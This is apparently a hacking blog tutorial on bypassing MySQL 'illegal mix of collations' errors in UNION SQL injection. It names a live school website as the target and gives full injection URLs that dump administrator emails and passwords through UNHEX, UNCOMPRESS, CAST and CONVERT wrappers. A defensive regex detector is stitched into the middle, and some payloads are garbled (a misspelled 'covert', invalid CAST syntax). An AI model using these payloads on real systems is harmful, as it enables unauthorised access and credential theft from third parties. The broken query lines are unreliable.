Bypass SQL Injection Illegal mix of collations for operation 'UNION' + Live Target 2021
Hi guys, admin fooster is back again xD. This time the admin will give a tutorial on Bypass SQL Injection illegal mix of collations for operation 'UNION'.
# Tutorial
Live Target : https://nyayanagarpublicschool.in/about_us.php?id=3
First, perform SQL Injection as usual.
Here I hit the error illegal mix of collations for operation 'UNION' when trying to dump the email and password from the administrators column.
url : https://nyayanagarpublicschool.in/about_us.php?id=-3%27+/*!50000UnIoN*/%20/*!50000SeLeCt*/+1,group_concat(EMAIL,0x3a,PASSWORD),3,4+from+administrators--+-
# Bypass
There are several methods to bypass illegal mix of collations for operation 'UNION'.
The following methods can be used:
1. UNCOMPRESS
Query : https://nyayanagarpublicschool.in/about_us.php?id=-3%27+/*!50000UnIoN*/%20/*!50000SeLeCt*/+1,uncompress(compress(group_concat(EMAIL,0x3a,PASSWORD))),3,4+from+administrators--+-
2. UNHEX
Query : https://nyayanagarpublicschool.in/about_us.php?id=-3%27+/*!50000UnIoN*/%20/*!50000SeLeCt*/+1,unhex(hex(group_concat(EMAIL,0x3a,PASSWORD))),3,4+from+administrators--+-
3. CAST
Query : https://nyayanagarpublicschool.in/about_us.php?id=-3%27+/*!50000UnIoN*/%20/*!50000SeLeCt*/+1,cast(EMAIL,0x3a,PASSWORD as binary),3,4+from+administrators--+-
4. CONVERT
Query : https://nyayanagarpublicschool.in/about_us.php?id=-3%27+/*!50000UnIoN*/%20/*!50000SeLeCt*/+1,covert(EMAIL,0x3a,PASSWORD using ascii),3,4+from+administrators--+-
If the CONVERT technique using ascii does not work, it can be replaced with:
1. ujis
2. ucs2
3. tis620
4. swe7
5. sjis
6. macroman
7. macce
8. latin7
9. latin5
10. latin2
Here I used the UNHEX method and it succeeded.
url : https://nyayanagarpublicschool.in/about_us.php?id=-3%27+/*!50000UnIoN*/%20/*!50000SeLeCt*/+1,unhex(hex(group_concat(EMAIL,0x3a,PASSWORD))),3,4+from+administrators--+-
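Seen from the defender's side, every request above has the same shape in an access log: a UNION SELECT hidden in MySQL versioned comments plus a charset round-trip wrapper around the selected value. The following is an added example, not part of the original post, that normalizes a query string and flags those markers; the rule names and the sample strings (table `t`, columns `a`, `b`) are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# MySQL runs the body of /*!50000 ... */ as SQL, so unwrap it instead of dropping it.
VERSIONED = re.compile(r"/\*!\d*(.*?)\*/", re.S)
PLAIN = re.compile(r"/\*.*?\*/", re.S)

# Rule names are this example's own labels.
RULES = {
    "union_select": re.compile(r"\bunion\s+(all\s+)?select\b"),
    "unhex_hex": re.compile(r"\bunhex\s*\(\s*hex\s*\("),
    "uncompress_compress": re.compile(r"\buncompress\s*\(\s*compress\s*\("),
    "cast_as_binary": re.compile(r"\bcast\s*\(.*?\bas\s+binary\b"),
    "convert_using": re.compile(r"\bconvert\s*\(.*?\busing\s+\w+"),
}

def normalize(query: str) -> str:
    """URL-decode, unwrap versioned comments, strip plain ones, fold case."""
    text = unquote_plus(query)
    text = VERSIONED.sub(r" \1 ", text)
    text = PLAIN.sub(" ", text)
    return re.sub(r"\s+", " ", text).lower()

def classify(query: str) -> list[str]:
    """Return the sorted names of all rules that match the normalized query."""
    text = normalize(query)
    return sorted(name for name, rx in RULES.items() if rx.search(text))

def scan(queries):
    """Return {query: hits} for every query string that matches at least one rule."""
    return {q: hits for q in queries if (hits := classify(q))}

# Constructed query strings (table t and columns a, b are placeholders).
SAMPLES = [
    "id=3",
    "q=student+union+elections",
    "id=-3%27+/*!50000UnIoN*/%20/*!50000SeLeCt*/+1,unhex(hex(group_concat(a,0x3a,b))),3,4+from+t--+-",
    "id=-3%27+union+select+1,convert(a+using+latin2),3,4+from+t--+-",
]

if __name__ == "__main__":
    for q, hits in scan(SAMPLES).items():
        print(hits, q)
```

Detection only narrows the window; the root cause is the `id` parameter being concatenated into the SQL text, which a parameterized query removes.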
# Closing
So that was the article Bypass SQL Injection Illegal mix of collations for operation 'UNION' + Live Target 2021. If you find this article useful, you can share it with your friends xD
Keep calm and Exploit!